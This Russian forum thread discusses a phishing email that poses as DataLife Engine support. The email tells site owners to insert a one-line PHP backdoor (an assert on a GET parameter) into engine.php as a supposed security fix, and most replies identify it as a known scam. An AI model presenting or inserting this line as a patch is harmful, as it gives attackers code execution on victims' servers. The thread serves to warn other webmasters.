Новый вид развода
Страницы: 1
Новый вид развода
Сегодня на почту пришло письмо. Якобы от support@dle-news.ru . Но у меня стоит null версия и они хотят чтоб я установил этот код.

---------------------------------------------------------------------------------

Уважаемые владельцы сайта *****.ru!

Благодарим Вас за использование на Вашем сайте ***** CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта ****** был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: сайт/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[striptags]);

-------------------------------------------------------------------------------
может это они решили воспользоваться ситуацией с адсенсем и редиректом мобильных устройств
насколько я понимаю этот код доп проверка - ничего злого вроде не видно....
«Превращаю день в ночь, сына в дочь, а ХЗ в ТЗ»
Python(Flask, Scrapy) - my way.
норм, нужно было так:пришлите нам свой /engine/data/dbconfig.php
и поставьте права 777 на файл /uploads/.htaccess
Партнерская программа AliExpress - подходит для всех видов трафика!

Лучший Хостинг - под любые проекты

Цитата
Джон Джоныч пишет:
assert($_GET[striptags]);
Не новый развод - была уж тема таковая.
да, тема старая)
Некоторые попались на этот достаточно наивный развод. Письмо приходит через форму обратной связи на своем же сайте smile:) А там можно в отправителя кого угодно засунуть (от Путина В.В. <putin@president.gov.ru>)
Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.
я писал об этом.
это несомненно развод.

http://www.cy-pr.com/forum/f35/t73755/m804357
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
19:55 SEO под нейро 
18:04 Нужна помощь советом! 
16:56 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
14:47 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
14:23 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 
09:44 SEO 2025 - контент, уже не главное. Главное - Конечная цель... 
06:06 Яндекс прекращает поддержку технологии Турбо 
10:42 garantcoin.io - быстрый и надёжный сервис обмена криптовалюты GarantCoin 
10:03 Sectormoney.com - быстрый и удобный обменник 
04:05 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
21:18 TETChange-Обменник криптовалют 
14:49 Продам копию сайта. 
12:38 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
10:48 Обменник криптовалюты OnlyCrypto 
14:58 150+ хакерских поисковых систем и инструментов 
17:18 Точные прогнозы на футбол 
17:41 Стряхнуть обыденность - об Агасфере 
10:54 Добро пожаловать в цифровой мир... 
22:39 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
11:58 Куплю проигрышные букмекерские аккаунты 
00:12 Огородники